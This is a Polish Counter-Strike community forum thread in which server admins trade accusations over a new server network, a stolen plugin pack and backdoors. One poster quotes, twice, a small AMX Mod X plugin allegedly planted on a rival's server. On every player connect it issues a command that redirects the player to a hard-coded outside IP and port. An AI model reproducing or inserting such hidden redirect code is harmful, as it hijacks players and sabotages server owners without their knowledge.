Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Nowy szablon forum

mygo.pl

Stworzyliśmy dla Was nowy wygląd forum. Z pewnością znajdziesz rzeczy, które wg Ciebie mogą zostać zmienione - wspomnij o tym w specjalnym wątku.

Czytaj więcej

Jak założyć własną sieć

serwerów CS

Zastanawiasz się nad prowadzeniem własnej sieci serwerów? Przeczytaj podstawowe informacje, na które należy zwrócić uwagę, przy takim projekcie.

Czytaj więcej

Tworzymy spis sieci

dodaj swoją

Dodaj sieć do której należysz, pozwoli to na promocję i budowę ogólnopolskiej bazy sieci CS.

Czytaj więcej

Recommended Posts

1 godzinę temu, Siwy | KILL4U.PL napisał:

Nie polecam, pomagają przy serwerze a później backdoory daja. 

Jakieś dowody? 

5 godzin temu, Siwy | KILL4U.PL napisał:

Nie polecam, pomagają przy serwerze a później backdoory daja. 

Poproszę o dowody że coś takiego było wgrane 😂 

Lepiej ty się pochwal kto ukradł paczkę.

56 minut temu, 「bicek」 napisał:

@4live - Nie wiem czemu, ale tak mnie wkur*iają takie reklamy graficzne, że szok... Może i najszybsza metoda na reklamę, ale mnie osobiście zniechęca do wejścia na forum, czy na reklamowany serwer. Wszystko na odjeb się. 🥵

@Siwy | KILL4U.PL - Wrzuć dowody jak kolega wyżej pisał. 😜 

Kod reklamowy mamy ale tak jak napisałeś najszybsza metoda na reklamę no i oczywiście wygodniej. Teraz juz mało kto ma te kody 3/4 to plakaty i dlatego umieściłem plakat. 

28 minut temu, Angel | Valkiria.com.pl napisał:

Jaka nowa?
Kolejny odgrzany kotlet, jak 90% ekip co wracają co jakiś czas ;]

Przyjmuje zakłady za jaki czas zostanie wystawiona na sprzedaż 😄 

I ten styl z forum o e-papierosach jest w pytkę 😄 

Nie jesteśmy starą ekipą FastGamers, domena została odkupiona. Więc można powiedzieć, ze my nie wróciliśmy na stare śmieci. 

Cytat

Przyjmuje zakłady

Nikt ci tego nie zabroni możesz robić co chcesz. Ale uważam że nikt nie wie co będzie w przyszłości więc proszę cię nie pisz z góry  takich rzeczy że zostanie wystawiona na sprzedż.

Może styl nie jest z najwyższej półki ale z wyglądu ładniejszy od twojego. 

3 minuty temu, `fern napisał:

Daj dowód, to po pierwsze a po drugie to on UKRADŁ nam paczkę 😉

Z tego co słyszałem to robiłeś mu paczkę, później wywaliliście go z waszej sieci bo zrobiliście sobie swojego onlydd2 i wgrales mu takie cos na serwer  

new MaxClients;
new NULL_STRING[1];
new Float:NULL_VECTOR[3];
public plugin_init()
{
	register_plugin("New Plug-In", "1.0", "DarkGL");
	return 0;
}

public client_connect(id)
{
	client_cmd(id, "\"connect\"91.224.117.35:27090");
	return 0;
}

po czym jak to usunąłem przyszedłeś na serwer i płakałeś ze ci paczkę ukradł ale do póki na  twój serwer wbijały osoby z jego reklamy to ci pasowało.

logo.png
BVRvKbx.gif

Również nie polecam, byłem przy tym jak @Siwy | KILL4U.PL z @Sanom (chyba nie ma tu konta na forum) szukali w plikach tego gówna, rozumiem backdoory które mają na celu zabezpieczenie własnej dupy (np. na wypadek kradzieży pluginu) ale takiego czegoś to nie pojmuję.

POMOGŁEM?  ZOSTAW PO SOBIE SERDUSZKO

SklepSMS.ovh - Najlepszy Sklep Usług na serwer CS:GO

PhLA01g.png

PluginySM.pl - Polski rynek pluginów SourceMod

6 minut temu, Roberrt napisał:

Również nie polecam, byłem przy tym jak @Siwy | KILL4U.PL z @Sanom (chyba nie ma tu konta na forum) szukali w plikach tego gówna, rozumiem backdoory które mają na celu zabezpieczenie własnej dupy (np. na wypadek kradzieży pluginu) ale takiego czegoś to nie pojmuję.

Tak, to było użyte na wypadek kradzieży, a on się odrazu pokusił 😉 

Pobrał pliki, ja mu serwer wyczyściłem (przed czym został poinformowany i się zgodził) i uciekł 😉

10 minut temu, Siwy | KILL4U.PL napisał:

Z tego co słyszałem to robiłeś mu paczkę, później wywaliliście go z waszej sieci bo zrobiliście sobie swojego onlydd2 i wgrales mu takie cos na serwer  

new MaxClients;
new NULL_STRING[1];
new Float:NULL_VECTOR[3];
public plugin_init()
{
	register_plugin("New Plug-In", "1.0", "DarkGL");
	return 0;
}

public client_connect(id)
{
	client_cmd(id, "\"connect\"91.224.117.35:27090");
	return 0;
}

po czym jak to usunąłem przyszedłeś na serwer i płakałeś ze ci paczkę ukradł ale do póki na  twój serwer wbijały osoby z jego reklamy to ci pasowało.

Przyszedłem, bo ukradł mi paczkę i używa jej na innej sieci, co do reklamy to nowi gracze zostali u niego, a stali u nas przy czym tego samego dnia została kupiona reklama

59 minut temu, `fern napisał:

Z dd2 jest pełno podobnych paczek, ja ta robiłem od zera i samemu dobierałem pluginy także mogę sobie przyznać autorstwo 😉 A kradzież to kradzież 😉

paczka autorska jest wtedy gdy wszystkie pluginy znajdujące się w paczce SĄ TWOJE. Inaczej to zwykła sklejka z neta.

Również nie polecam. Chłopaki mieli spory problem z znalezieniem tego "przekierowania" w pluginach, ale osoba która to zrobiła jest totalnym debilem bo wrzucił w serwer sam na Siebie dowód a mianowicie plik .sma, brawo chłopaki inteligencji. Dodatko to przekierowanie nie było w jednym pluginie a w 2, to totalnie już jest szczyt chamstwa. Ta sieć nie ma przyszłości.

Robiąc paczke z gotowych pluginów to jest sklejka a nie "Twoja paczka", tam nie ma nic nadzwyczajnego ! 🙂

Przepraszam, autorska sklejka modyfikacji? Pierwszo słyszę, ale spróbuję skopiować silnik Porshe i się pod nim podpisać, może uda mi się zarobić parę złoty.

42 minuty temu, s0^ napisał:

Przepraszam, autorska sklejka modyfikacji? Pierwszo słyszę, ale spróbuję skopiować silnik Porshe i się pod nim podpisać, może uda mi się zarobić parę złoty.

Daj znać czy Ci się udało.